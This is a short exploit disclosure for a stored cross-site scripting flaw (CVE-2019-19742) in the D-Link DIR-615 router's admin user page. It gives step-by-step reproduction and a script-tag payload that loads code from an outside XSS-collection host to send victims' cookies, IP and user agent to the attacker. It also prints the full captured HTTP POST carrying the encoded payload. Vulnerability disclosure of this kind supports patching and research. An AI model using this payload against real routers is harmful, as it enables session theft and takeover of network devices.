D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting

######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting
# Date: 13.12.2019
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali Linux
# CVE: CVE-2019-19742
#######################################################################################
Reproduction Steps:
-------------------
  1. Log in to your Wi-Fi router gateway with admin credentials [i.e.: http://192.168.0.1]
  2. Go to the Maintenance page and click on Admin in the left panel.
  3. Put the blind XSS payload into the name field: "><script src=https://ptguy.xss.ht></script>. The payload is saved by the server and reflected in the user page.
  4. On every refresh of the user home page, the XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
  5. For HTML injection, just put <b> Testing </b> in the username field; the username will appear in bold on your homepage.
#######################################################################################
# Burp Intercept

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
